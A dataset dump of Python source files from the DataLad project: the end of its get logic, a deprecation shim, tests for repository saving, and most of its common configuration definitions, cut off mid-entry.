in dataset arg\n # as is\n dataset=dataset,\n # always come from the top to get sensible generator behavior\n bottomup=False,\n # when paths are given, they will constrain the recursion\n # automatically, and we need to enable recursion so we can\n # location path in subdatasets several levels down\n recursive=True if path else recursive,\n recursion_limit=None if path else recursion_limit,\n return_type='generator',\n on_failure='ignore',\n result_renderer='disabled'):\n if sdsres.get('type', None) != 'dataset':\n # if it is not about a 'dataset' it is likely content in\n # the root dataset\n if sdsres.get('status', None) == 'impossible' and \\\n sdsres.get('message', None) == \\\n 'path not contained in any matching subdataset':\n target_path = Path(sdsres['path'])\n if refds.pathobj != target_path and \\\n refds.pathobj not in target_path.parents:\n yield dict(\n action='get',\n path=str(target_path),\n status='error',\n message=('path not associated with dataset %s',\n refds),\n )\n continue\n # check if we need to obtain anything underneath this path\n # the subdataset() call above will only look _until_ it\n # hits the targetpath\n for res in _install_targetpath(\n refds,\n Path(sdsres['path']),\n recursive,\n recursion_limit,\n reckless,\n refds_path,\n 
description,\n jobs=jobs,\n ):\n # fish out the datasets that 'contains' a targetpath\n # and store them for later\n if res.get('status', None) in ('ok', 'notneeded') and \\\n 'contains' in res:\n dsrec = content_by_ds.get(res['path'], set())\n dsrec.update(res['contains'])\n content_by_ds[res['path']] = dsrec\n if res.get('status', None) != 'notneeded':\n # all those messages on not having installed anything\n # are a bit pointless\n # \"notneeded\" for annex get comes below\n # prevent double yielding of impossible result\n if _check_error_reported_before(res, error_reported):\n continue\n yield res\n else:\n # dunno what this is, send upstairs\n yield sdsres\n # must continue for both conditional branches above\n # the rest is about stuff in real subdatasets\n continue\n # instance of the closest existing dataset for this result\n ds = Dataset(sdsres['parentds']\n if sdsres.get('state', None) == 'absent'\n else sdsres['path'])\n assert 'contains' in sdsres\n # explore the unknown\n for target_path in sdsres.get('contains', []):\n # essentially the same as done above for paths in the root\n # dataset, but here we are starting from the closest\n # discovered subdataset\n for res in _install_targetpath(\n ds,\n Path(target_path),\n recursive,\n recursion_limit,\n reckless,\n refds_path,\n description,\n jobs=jobs,\n ):\n known_ds = res['path'] in content_by_ds\n if res.get('status', None) in ('ok', 'notneeded') and \\\n 'contains' in res:\n dsrec = content_by_ds.get(res['path'], set())\n dsrec.update(res['contains'])\n content_by_ds[res['path']] = dsrec\n # prevent double-reporting of datasets that have been\n # installed by explorative installation to get to target\n # paths, prior in this loop\n if res.get('status', None) != 'notneeded' or not known_ds:\n # prevent double yielding of impossible result\n if _check_error_reported_before(res, error_reported):\n continue\n yield res\n\n if not get_data:\n # done already\n return\n\n # and now annex-get, this could all be done in parallel now\n for ds, content in content_by_ds.items():\n for res in _get_targetpaths(\n Dataset(ds),\n content,\n refds.path,\n source,\n jobs):\n if 'path' not in res or res['path'] not in content_by_ds:\n # we had reports on datasets and subdatasets already\n # before the annex stage\n yield res\n" }, { "alpha_fraction": 0.7397769689559937, "alphanum_fraction": 0.7397769689559937, "avg_line_length": 28.88888931274414, "blob_id": "69078beb1fd40f965303390748d651e1571ec793", "content_id": "ffe2b2b8f8bc57c07b4099d31a4ea263515862b5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 269, "license_type": "permissive", "max_line_length": 78, "num_lines": 9, "path": "/datalad/plugin/add_readme.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.add_readme is deprecated and will be removed in a future \"\n \"release. 
\"\n \"Use the module from its new location datalad.local.add_readme instead.\",\n DeprecationWarning)\n\nfrom datalad.local.add_readme import *\n" }, { "alpha_fraction": 0.6093872785568237, "alphanum_fraction": 0.6186801195144653, "avg_line_length": 31.39285659790039, "blob_id": "c3f5d63c15a6288245d57e8eeeab652a091aff7e", "content_id": "4973e46f9c81a1cd9117a75a7d8c11842c9de3c0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6349, "license_type": "permissive", "max_line_length": 90, "num_lines": 196, "path": "/datalad/support/tests/test_repo_save.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test saveds function\"\"\"\n\nimport shutil\n\nfrom datalad.api import create\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_repo_status,\n create_tree,\n eq_,\n get_annexstatus,\n get_convoluted_situation,\n known_failure_windows,\n slow,\n with_tempfile,\n)\nfrom datalad.utils import (\n on_windows,\n rmtree,\n)\n\n\n@with_tempfile\ndef test_save_basics(path=None):\n ds = Dataset(path).create(result_renderer='disabled')\n # nothing happens\n eq_(list(ds.repo.save(paths=[], _status={})),\n [])\n\n # dataset is clean, so nothing happens with all on default\n eq_(list(ds.repo.save()),\n [])\n\n\ndef _test_save_all(path, repocls):\n ds = get_convoluted_situation(path, repocls)\n orig_status = ds.repo.status(untracked='all')\n # TODO test the results when the are crafted\n res = ds.repo.save()\n # make sure we get a 'delete' result for each deleted file\n eq_(\n set(r['path'] for r in res if r['action'] == 'delete'),\n {str(k) for k, v in orig_status.items()\n if k.name in ('file_deleted', 'file_staged_deleted')}\n )\n saved_status = ds.repo.status(untracked='all')\n # we still have an entry for everything that did not get deleted\n # intentionally\n eq_(\n len([f for f, p in orig_status.items()\n if not f.match('*_deleted')]),\n len(saved_status))\n # everything but subdataset entries that contain untracked content,\n # or modified subsubdatasets is now clean, a repo simply doesn touch\n # other repos' private parts\n for f, p in saved_status.items():\n if p.get('state', None) != 'clean':\n assert f.match('subds_modified'), f\n\n # Since we already have rich filetree, now save at dataset level\n # recursively and introspect some known gotchas\n resr = ds.save(recursive=True)\n\n # File within subdataset got committed to git-annex, which was not the\n # case for GitRepo parent https://github.com/datalad/datalad/issues/7351\n assert_in_results(\n resr,\n status='ok',\n path=str(ds.pathobj / 'subds_modified' / 'someds' / 'dirtyds' / 'file_untracked'),\n # if key is None -- was committed to git which should have not happened!\n key=\"MD5E-s14--2c320e0c56ed653384a926292647f226\")\n\n return ds\n\n\n@slow # 11sec on travis\n@known_failure_windows # see gh-5462\n@with_tempfile\ndef test_gitrepo_save_all(path=None):\n _test_save_all(path, GitRepo)\n\n\n@slow # 11sec on travis\n@known_failure_windows # see 
gh-5462\n@with_tempfile\ndef test_annexrepo_save_all(path=None):\n _test_save_all(path, AnnexRepo)\n\n\n@with_tempfile\ndef test_save_typechange(path=None):\n ckwa = dict(result_renderer='disabled')\n ds = Dataset(path).create(**ckwa)\n foo = ds.pathobj / 'foo'\n # save a file\n foo.write_text('some')\n ds.save(**ckwa)\n # now delete the file and replace with a directory and a file in it\n foo.unlink()\n foo.mkdir()\n bar = foo / 'bar'\n bar.write_text('foobar')\n res = ds.save(**ckwa)\n assert_in_results(res, path=str(bar), action='add', status='ok')\n assert_repo_status(ds.repo)\n if not on_windows:\n # now replace file with subdataset\n # (this is https://github.com/datalad/datalad/issues/5418)\n bar.unlink()\n Dataset(ds.pathobj / 'tmp').create(**ckwa)\n shutil.move(ds.pathobj / 'tmp', bar)\n res = ds.save(**ckwa)\n assert_repo_status(ds.repo)\n assert len(ds.subdatasets(**ckwa)) == 1\n # now replace directory with subdataset\n rmtree(foo)\n Dataset(ds.pathobj / 'tmp').create(**ckwa)\n shutil.move(ds.pathobj / 'tmp', foo)\n # right now a first save() will save the subdataset removal only\n ds.save(**ckwa)\n # subdataset is gone\n assert len(ds.subdatasets(**ckwa)) == 0\n # but it takes a second save() run to get a valid status report\n # to understand that there is a new subdataset on a higher level\n ds.save(**ckwa)\n assert_repo_status(ds.repo)\n assert len(ds.subdatasets(**ckwa)) == 1\n # now replace subdataset with a file\n rmtree(foo)\n foo.write_text('some')\n ds.save(**ckwa)\n assert_repo_status(ds.repo)\n\n\n@with_tempfile\ndef test_save_to_git(path=None):\n ds = Dataset(path).create(result_renderer='disabled')\n create_tree(\n ds.path,\n {\n 'file_ingit': 'file_ingit',\n 'file_inannex': 'file_inannex',\n }\n )\n ds.repo.save(paths=['file_ingit'], git=True)\n ds.repo.save(paths=['file_inannex'])\n assert_repo_status(ds.repo)\n for f, p in get_annexstatus(ds.repo).items():\n eq_(p['state'], 'clean')\n if f.match('*ingit'):\n assert_not_in('key', p, f)\n elif f.match('*inannex'):\n assert_in('key', p, f)\n\n\n@with_tempfile\ndef test_save_subds_change(path=None):\n ckwa = dict(result_renderer='disabled')\n ds = Dataset(path).create(**ckwa)\n subds = ds.create('sub', **ckwa)\n assert_repo_status(ds.repo)\n rmtree(subds.path)\n res = ds.save(**ckwa)\n assert_repo_status(ds.repo)\n # updated .gitmodules, deleted subds, saved superds\n assert len(res) == 3\n assert_in_results(\n res, type='dataset', path=ds.path, action='save')\n assert_in_results(\n res, type='dataset', path=subds.path, action='delete')\n assert_in_results(\n res, type='file', path=str(ds.pathobj / '.gitmodules'), action='add')\n # now add one via save\n subds2 = create(ds.pathobj / 'sub2', **ckwa)\n res = ds.save(**ckwa)\n # updated .gitmodules, added subds, saved superds\n assert len(res) == 3\n assert_repo_status(ds.repo)\n assert_in_results(\n res, type='dataset', path=ds.path, action='save')\n assert_in_results(\n res, type='dataset', path=subds2.path, action='add')\n assert_in_results(\n res, type='file', path=str(ds.pathobj / '.gitmodules'), action='add')\n" }, { "alpha_fraction": 0.5544453859329224, "alphanum_fraction": 0.556378185749054, "avg_line_length": 41.4561882019043, "blob_id": "d64d2e93c2a7086127d26548b9b27fe9753463e6", "content_id": "1a17045f071cfbaea4de4ae3a7dd90ec0ccaca6c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30528, "license_type": "permissive", "max_line_length": 251, "num_lines": 719, "path": 
"/datalad/interface/common_cfg.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Common configuration options\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom collections.abc import Mapping\nimport logging\nfrom os import environ\nfrom os.path import expanduser\nfrom os.path import join as opj\nimport time\n\nfrom platformdirs import AppDirs\n\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureChoice,\n EnsureInt,\n EnsureFloat,\n EnsureListOf,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.utils import on_windows\n\nlgr = logging.getLogger('datalad.interface.common_cfg')\ndirs = AppDirs(\"datalad\", \"datalad.org\")\n\n\nclass _NotGiven():\n pass\n\n\nclass _ConfigDefinitions(Mapping):\n \"\"\"A container for configuration definitions\n\n This class implements the parts of the dictionary interface\n required to work as a drop-in replacement for the legacy\n data structure used for configuration definitions prior\n DataLad 0.16.\n\n .. note::\n\n This is an internal helper that may change at any time without\n prior notice.\n \"\"\"\n def __init__(self):\n self._defs = {\n k: _ConfigDefinition(**v) for k, v in _definitions.items()\n if v is not _NotGiven\n }\n\n def get(self, *args):\n return self._defs.get(*args)\n\n def keys(self):\n return self._defs.keys()\n\n def items(self):\n return self._defs.items()\n\n def __setitem__(self, key, value):\n self._defs.__setitem__(key, value)\n\n def __getitem__(self, key):\n return self._defs.__getitem__(key)\n\n def __contains__(self, key):\n return self._defs.__contains__(key)\n\n def __iter__(self):\n return self._defs.__iter__()\n\n def __len__(self):\n return self._defs.__len__()\n\n\nclass _ConfigDefinition(Mapping):\n \"\"\"A single configuration definition\n\n This class implements the parts of the dictionary interface\n required to work as a drop-in replacement for the legacy\n data structure used for a configuration definition prior\n DataLad 0.16.\n\n Moreover, it implement lazy evaluation of default values,\n when a 'default_fn' property is given.\n\n .. 
note::\n\n This is an internal helper that may change at any time without\n prior notice.\n \"\"\"\n def __init__(self, **kwargs):\n # just take it, no validation on ingestions for max speed\n self._props = kwargs\n\n def __getitem__(self, prop):\n if prop == 'default' \\\n and 'default' not in self._props \\\n and 'default_fn' in self._props:\n default = self._props[\"default_fn\"]()\n self._props['default'] = default\n return default\n return self._props[prop]\n\n def __setitem__(self, key, val):\n self._props.__setitem__(key, val)\n\n def get(self, prop, default=None):\n try:\n return self.__getitem__(prop)\n except KeyError:\n return default\n\n def __contains__(self, prop):\n if prop == 'default':\n return 'default' in self._props or 'default_fn' in self._props\n return self._props.__contains__(prop)\n\n def __str__(self):\n return self._props.__str__()\n\n def __repr__(self):\n return self._props.__repr__()\n\n def __iter__(self):\n return self._props.__iter__()\n\n def __len__(self):\n return self._props.__len__()\n\n def update(self, *args, **kwargs):\n self._props.update(*args, **kwargs)\n\n\ndef get_default_ssh():\n from datalad.utils import on_windows\n from pathlib import Path\n\n if on_windows:\n windows_openssh_path = \\\n environ.get(\"WINDIR\", r\"C:\\Windows\") + r\"\\System32\\OpenSSH\\ssh.exe\"\n if Path(windows_openssh_path).exists():\n return windows_openssh_path\n return \"ssh\"\n\n\nsubst_rule_docs = \"\"\"\\\nA substitution specification is a string with a match and substitution\nexpression, each following Python's regular expression syntax. Both expressions\nare concatenated to a single string with an arbitrary delimiter character. The\ndelimiter is defined by prefixing the string with the delimiter. Prefix and\ndelimiter are stripped from the expressions (Example:\n\",^http://(.*)$,https://\\\\1\"). This setting can be defined multiple times.\nSubstitutions will be applied incrementally, in order of their definition. The\nfirst substitution in such a series must match, otherwise no further\nsubstitutions in a series will be considered. However, following the first\nmatch all further substitutions in a series are processed, regardless whether\nintermediate expressions match or not.\"\"\"\n\n\n_definitions = {\n 'datalad.clone.url-substitute.github': {\n 'ui': ('question', {\n 'title': 'GitHub URL substitution rule',\n 'text': 'Mangling for GitHub-related URL. ' + subst_rule_docs\n }),\n 'destination': 'global',\n 'default': (\n # take any github project URL apart into <org>###<identifier>\n r',https?://github.com/([^/]+)/(.*)$,\\1###\\2',\n # replace any (back)slashes with a single dash\n r',[/\\\\]+(?!$),-',\n # replace any whitespace (include urlquoted variant)\n # with a single underscore\n r',\\s+|(%2520)+|(%20)+,_',\n # rebuild functional project URL\n r',([^#]+)###(.*),https://github.com/\\1/\\2',\n )\n },\n # TODO this one should migrate to the datalad-osf extension. however, right\n # now extensions cannot provide default configuration\n # https://github.com/datalad/datalad/issues/5769\n 'datalad.clone.url-substitute.osf': {\n 'ui': ('question', {\n 'title': 'Open Science Framework URL substitution rule',\n 'text': 'Mangling for OSF-related URLs. 
' + subst_rule_docs\n }),\n 'destination': 'global',\n 'default': (\n # accept browser-provided URL and convert to those accepted by\n # the datalad-osf extension\n r',^https://osf.io/([^/]+)[/]*$,osf://\\1',\n )\n },\n # this is actually used in downloaders, but kept cfg name original\n 'datalad.crawl.cache': {\n 'ui': ('yesno', {\n 'title': 'Crawler download caching',\n 'text': 'Should the crawler cache downloaded files?'}),\n 'destination': 'local',\n 'type': EnsureBool(),\n },\n # this is actually used in downloaders, but kept cfg name original\n 'datalad.credentials.force-ask': {\n 'ui': ('yesno', {\n 'title': 'Force (re-)entry of credentials',\n 'text': 'Should DataLad prompt for credential (re-)entry? This '\n 'can be used to update previously stored credentials.'}),\n 'type': EnsureBool(),\n 'default': False,\n },\n 'datalad.credentials.githelper.noninteractive':{\n 'ui': ('yesno', {\n 'title': 'Non-interactive mode for git-credential helper',\n 'text': 'Should git-credential-datalad operate in '\n 'non-interactive mode? This would mean to not ask for '\n 'user confirmation when storing new '\n 'credentials/provider configs.'}),\n 'type': bool,\n 'default': False,\n },\n 'datalad.extensions.load': {\n 'ui': ('question', {\n 'title': 'DataLad extension packages to load',\n 'text': 'Indicate which extension packages should be loaded '\n 'unconditionally on CLI startup or on importing '\n \"'datalad.[core]api'. This enables the \"\n 'respective extensions to customize DataLad with '\n 'functionality and configurability outside the '\n 'scope of extension commands. For merely running '\n 'extension commands it is not necessary to load them '\n 'specifically'}),\n 'destination': 'global',\n 'default': None,\n },\n 'datalad.externals.nda.dbserver': {\n 'ui': ('question', {\n 'title': 'NDA database server',\n 'text': 'Hostname of the database server'}),\n 'destination': 'global',\n # Development one is https://development.nimhda.org\n 'default': 'https://nda.nih.gov/DataManager/dataManager',\n },\n 'datalad.locations.cache': {\n 'ui': ('question', {\n 'title': 'Cache directory',\n 'text': 'Where should datalad cache files?'}),\n 'destination': 'global',\n 'default_fn': lambda: dirs.user_cache_dir,\n },\n 'datalad.locations.default-dataset': {\n 'ui': ('question', {\n 'title': 'Default dataset path',\n 'text': 'Where should datalad should look for (or install) a '\n 'default dataset?'}),\n 'destination': 'global',\n 'default_fn': lambda: opj(expanduser('~'), 'datalad'),\n },\n 'datalad.locations.locks': {\n 'ui': ('question', {\n 'title': 'Lockfile directory',\n 'text': 'Where should datalad store lock files?'}),\n 'destination': 'global',\n 'default_fn': lambda: opj(dirs.user_cache_dir, 'locks')\n },\n 'datalad.locations.sockets': {\n 'ui': ('question', {\n 'title': 'Socket directory',\n 'text': 'Where should datalad store socket files?'}),\n 'destination': 'global',\n 'default_fn': lambda: opj(dirs.user_cache_dir, 'sockets'),\n },\n 'datalad.locations.system-procedures': {\n 'ui': ('question', {\n 'title': 'System procedure directory',\n 'text': 'Where should datalad search for system procedures?'}),\n 'destination': 'global',\n 'default_fn': lambda: opj(dirs.site_config_dir, 'procedures'),\n },\n 'datalad.locations.user-procedures': {\n 'ui': ('question', {\n 'title': 'User procedure directory',\n 'text': 'Where should datalad search for user procedures?'}),\n 'destination': 'global',\n 'default_fn': lambda: opj(dirs.user_config_dir, 'procedures'),\n },\n 
'datalad.locations.extra-procedures': {\n 'ui': ('question', {\n 'title': 'Extra procedure directory',\n 'text': 'Where should datalad search for some additional procedures?'}),\n 'destination': 'global',\n },\n 'datalad.locations.dataset-procedures': {\n 'ui': ('question', {\n 'title': 'Dataset procedure directory',\n 'text': 'Where should datalad search for dataset procedures (relative to a dataset root)?'}),\n 'destination': 'dataset',\n 'default': opj('.datalad', 'procedures'),\n },\n 'datalad.exc.str.tblimit': {\n 'ui': ('question', {\n 'title': 'This flag is used by datalad to cap the number of traceback steps included in exception logging and result reporting to DATALAD_EXC_STR_TBLIMIT of pre-processed entries from traceback.'}),\n },\n 'datalad.fake-dates': {\n 'ui': ('yesno', {\n 'title': 'Fake (anonymize) dates',\n 'text': 'Should the dates in the logs be faked?'}),\n 'destination': 'local',\n 'type': EnsureBool(),\n 'default': False,\n },\n 'datalad.fake-dates-start': {\n 'ui': ('question', {\n 'title': 'Initial fake date',\n 'text': 'When faking dates and there are no commits in any local branches, generate the date by adding one second to this value (Unix epoch time). The value must be positive.'}),\n 'type': EnsureInt(),\n 'default': 1112911993,\n },\n 'datalad.github.token-note': {\n 'ui': ('question', {\n 'title': 'GitHub token note',\n 'text': 'Description for a Personal access token to generate.'}),\n 'default': 'DataLad',\n },\n 'datalad.tests.nonetwork': {\n 'ui': ('yesno', {\n 'title': 'Skips network tests completely if this flag is set, Examples include test for S3, git_repositories, OpenfMRI, etc'}),\n 'type': EnsureBool(),\n },\n 'datalad.tests.nonlo': {\n 'ui': ('question', {\n 'title': 'Specifies network interfaces to bring down/up for testing. Currently used by Travis CI.'}),\n },\n 'datalad.tests.noteardown': {\n 'ui': ('yesno', {\n 'title': 'Does not execute teardown_package which cleans up temp files and directories created by tests if this flag is set'}),\n 'type': EnsureBool(),\n },\n 'datalad.tests.dataladremote': {\n 'ui': ('yesno', {\n 'title': 'Binary flag to specify whether each annex repository should get datalad special remote in every test repository'}),\n 'type': EnsureBool(),\n },\n 'datalad.tests.runcmdline': {\n 'ui': ('yesno', {\n 'title': 'Binary flag to specify if shell testing using shunit2 to be carried out'}),\n 'type': EnsureBool(),\n },\n 'datalad.tests.ssh': {\n 'ui': ('yesno', {\n 'title': 'Skips SSH tests if this flag is **not** set'}),\n 'type': EnsureBool(),\n },\n 'datalad.tests.knownfailures.skip': {\n 'ui': ('yesno', {\n 'title': 'Skips tests that are known to currently fail'}),\n 'type': EnsureBool(),\n 'default': True,\n },\n 'datalad.tests.knownfailures.probe': {\n 'ui': ('yesno', {\n 'title': 'Probes tests that are known to fail on whether or not they are actually still failing'}),\n 'type': EnsureBool(),\n 'default': False,\n },\n 'datalad.tests.setup.testrepos': {\n 'ui': ('question', {\n 'title': 'Pre-creates repositories for @with_testrepos within setup_package'}),\n 'type': EnsureBool(),\n 'default': False,\n },\n 'datalad.tests.temp.dir': {\n 'ui': ('question', {\n 'title': 'Create a temporary directory at location specified by this flag. 
It is used by tests to create a temporary git directory while testing git annex archives etc'}),\n 'type': EnsureStr(),\n 'default_fn': lambda: environ.get('TMPDIR'),\n },\n 'datalad.tests.temp.keep': {\n 'ui': ('yesno', {\n 'title': 'Function rmtemp will not remove temporary file/directory created for testing if this flag is set'}),\n 'type': EnsureBool(),\n },\n 'datalad.tests.temp.fs': {\n 'ui': ('question', {\n 'title': 'Specify the temporary file system to use as loop device for testing DATALAD_TESTS_TEMP_DIR creation'}),\n },\n 'datalad.tests.temp.fssize': {\n 'ui': ('question', {\n 'title': 'Specify the size of temporary file system to use as loop device for testing DATALAD_TESTS_TEMP_DIR creation'}),\n },\n 'datalad.tests.ui.backend': {\n 'ui': ('question', {\n 'title': 'Tests UI backend',\n # XXX we could add choices...\n 'text': 'Which UI backend to use'}),\n 'default': 'tests-noninteractive',\n },\n 'datalad.tests.usecassette': {\n 'ui': ('question', {\n 'title': 'Specifies the location of the file to record network transactions by the VCR module. Currently used by when testing custom special remotes'}),\n },\n 'datalad.tests.cache': {\n 'ui': ('question', {\n 'title': 'Cache directory for tests',\n 'text': 'Where should datalad cache test files?'}),\n 'destination': 'global',\n 'default_fn': lambda: opj(dirs.user_cache_dir, 'tests')\n },\n 'datalad.tests.credentials': {\n 'ui': ('question', {\n 'title': 'Credentials to use during tests',\n 'text': 'Which credentials should be available while running tests? If \"plaintext\" (default), '\n 'a new plaintext keyring would be created in tests temporary HOME. If \"system\", '\n 'no custom configuration would be passed to keyring and known to system credentials '\n 'could be used.'\n }),\n 'destination': 'global',\n 'type': EnsureChoice('plaintext', 'system'),\n 'default': \"plaintext\"\n },\n 'datalad.log.level': {\n 'ui': ('question', {\n 'title': 'Used for control the verbosity of logs printed to '\n 'stdout while running datalad commands/debugging'}),\n },\n 'datalad.log.result-level': {\n 'ui': ('question', {\n 'title': 'Log level for command result messages',\n 'text': \"If 'match-status', it will log 'impossible' \"\n \"results as a warning, 'error' results as errors, and \"\n \"everything else as 'debug'. Otherwise the indicated \"\n \"log-level will be used for all such messages\"}),\n 'type': EnsureChoice('debug', 'info', 'warning', 'error',\n 'match-status'),\n 'default': 'debug',\n },\n 'datalad.log.name': {\n 'ui': ('question', {\n 'title': 'Include name of the log target in the log line'}),\n },\n 'datalad.log.names': {\n 'ui': ('question', {\n 'title': 'Which names (,-separated) to print log lines for'}),\n },\n 'datalad.log.namesre': {\n 'ui': ('question', {\n 'title': 'Regular expression for which names to print log lines for'}),\n },\n 'datalad.log.outputs': {\n 'ui': ('question', {\n 'title': 'Whether to log stdout and stderr for executed commands',\n 'text': 'When enabled, setting the log level to 5 '\n 'should catch all execution output, '\n 'though some output may be logged at higher levels'}),\n 'default': False,\n 'type': EnsureBool(),\n },\n 'datalad.log.timestamp': {\n 'ui': ('yesno', {\n 'title': 'Used to add timestamp to datalad logs'}),\n 'default': False,\n 'type': EnsureBool(),\n },\n 'datalad.log.traceback': {\n 'ui': ('question', {\n 'title': 'Includes a compact traceback in a log message, with '\n 'generic components removed. 
'\n 'This setting is only in effect when given as an '\n 'environment variable DATALAD_LOG_TRACEBACK. '\n 'An integer value specifies the maximum traceback '\n 'depth to be considered. '\n 'If set to \"collide\", a common traceback prefix '\n 'between a current traceback and a previously logged '\n 'traceback is replaced with \"…\" (maximum depth 100).'}),\n },\n 'datalad.ssh.identityfile': {\n 'ui': ('question', {\n 'title': \"If set, pass this file as ssh's -i option.\"}),\n 'destination': 'global',\n 'default': None,\n },\n 'datalad.ssh.multiplex-connections': {\n 'ui': ('question', {\n 'title': \"Whether to use a single shared connection for multiple SSH processes aiming at the same target.\"}),\n 'destination': 'global',\n 'default': not on_windows,\n 'type': EnsureBool(),\n },\n 'datalad.ssh.try-use-annex-bundled-git': {\n 'ui': ('question', {\n 'title': \"Whether to attempt adjusting the PATH in a remote \"\n \"shell to include Git binaries located in a detected \"\n \"git-annex bundle\",\n 'text': \"If enabled, this will be a 'best-effort' attempt that \"\n \"only supports remote hosts with a Bourne shell and \"\n \"the `which` command available. The remote PATH must \"\n \"already contain a git-annex installation. \"\n \"If git-annex is not found, or the detected git-annex \"\n \"does not have a bundled Git installation, detection \"\n \"failure will not result in an error, but only slow \"\n \"remote execution by one-time sensing overhead per \"\n \"each opened connection.\"}),\n 'destination': 'global',\n 'default': False,\n 'type': EnsureBool(),\n },\n 'datalad.annex.retry': {\n 'ui': ('question',\n {'title': 'Value for annex.retry to use for git-annex calls',\n 'text': 'On transfer failure, annex.retry (sans \"datalad.\") '\n 'controls the number of times that git-annex retries. '\n 'DataLad will call git-annex with annex.retry set '\n 'to the value here unless the annex.retry '\n 'is explicitly configured'}),\n 'type': EnsureInt(),\n 'default': 3,\n },\n 'datalad.repo.backend': {\n 'ui': ('question', {\n 'title': 'git-annex backend',\n 'text': 'Backend to use when creating git-annex repositories'}),\n 'default': 'MD5E',\n },\n 'datalad.repo.direct': {\n 'ui': ('yesno', {\n 'title': 'Direct Mode for git-annex repositories',\n 'text': 'Set this flag to create annex repositories in direct mode by default'}),\n 'type': EnsureBool(),\n 'default': False,\n },\n 'datalad.repo.version': {\n 'ui': ('question', {\n 'title': 'git-annex repository version',\n 'text': 'Specifies the repository version for git-annex to be used by default'}),\n 'type': EnsureInt(),\n 'default': 8,\n },\n 'datalad.runtime.max-annex-jobs': {\n 'ui': ('question', {\n 'title': 'Maximum number of git-annex jobs to request when \"jobs\" option set to \"auto\" (default)',\n 'text': 'Set this value to enable parallel annex jobs that may speed up certain operations (e.g. get file content). 
The effective number of jobs will not exceed the number of available CPU cores (or 3 if there is less than 3 cores).'}),\n 'type': EnsureInt(),\n 'default': 1,\n },\n 'datalad.runtime.max-batched': {\n 'ui': ('question', {\n 'title': 'Maximum number of batched commands to run in parallel',\n 'text': 'Automatic cleanup of batched commands will try to keep at most this many commands running.'}),\n 'type': EnsureInt(),\n 'default': 20,\n },\n 'datalad.runtime.max-inactive-age': {\n 'ui': ('question', {\n 'title': 'Maximum time (in seconds) a batched command can be'\n ' inactive before it is eligible for cleanup',\n 'text': 'Automatic cleanup of batched commands will consider an'\n ' inactive command eligible for cleanup if more than this'\n ' many seconds have transpired since the command\\'s last'\n ' activity.'}),\n 'type': EnsureInt(),\n 'default': 60,\n },\n 'datalad.runtime.max-jobs': {\n 'ui': ('question', {\n 'title': 'Maximum number of jobs DataLad can run in \"parallel\"',\n 'text': 'Set this value to enable parallel multi-threaded DataLad jobs that may speed up certain '\n 'operations, in particular operation across multiple datasets (e.g., install multiple '\n 'subdatasets, etc).'}),\n 'type': EnsureInt(),\n 'default': 1,\n },\n 'datalad.runtime.pathspec-from-file': {\n 'ui': ('question', {\n 'title': 'Provide list of files to git commands via --pathspec-from-file',\n 'text': \"Instructs when DataLad will provide list of paths to 'git' commands which \"\n \"support --pathspec-from-file option via some temporary file. If set to \"\n \"'multi-chunk' it will be done only if multiple invocations of the command \"\n \"on chunks of files list is needed. If set to 'always', DataLad will always \"\n \"use --pathspec-from-file.\"}),\n 'type': EnsureChoice('multi-chunk', 'always'),\n 'default': 'multi-chunk',\n },\n 'datalad.runtime.raiseonerror': {\n 'ui': ('question', {\n 'title': 'Error behavior',\n 'text': 'Set this flag to cause DataLad to raise an exception on errors that would have otherwise just get logged'}),\n 'type': EnsureBool(),\n 'default': False,\n },\n 'datalad.runtime.report-status': {\n 'ui': ('question', {\n 'title': 'Command line result reporting behavior',\n 'text': \"If set (to other than 'all'), constrains command result report to records matching the given status. 'success' is a synonym for 'ok' OR 'notneeded', 'failure' stands for 'impossible' OR 'error'\"}),\n 'type': EnsureChoice('all', 'success', 'failure', 'ok', 'notneeded', 'impossible', 'error'),\n 'default': None,\n },\n 'datalad.runtime.stalled-external': {\n 'ui': ('question', {\n 'title': 'Behavior for handing external processes',\n 'text': 'What to do with external processes if they do not finish in some minimal reasonable time. '\n 'If \"abandon\", datalad would proceed without waiting for external process to exit. '\n 'ATM applies only to batched git-annex processes. 
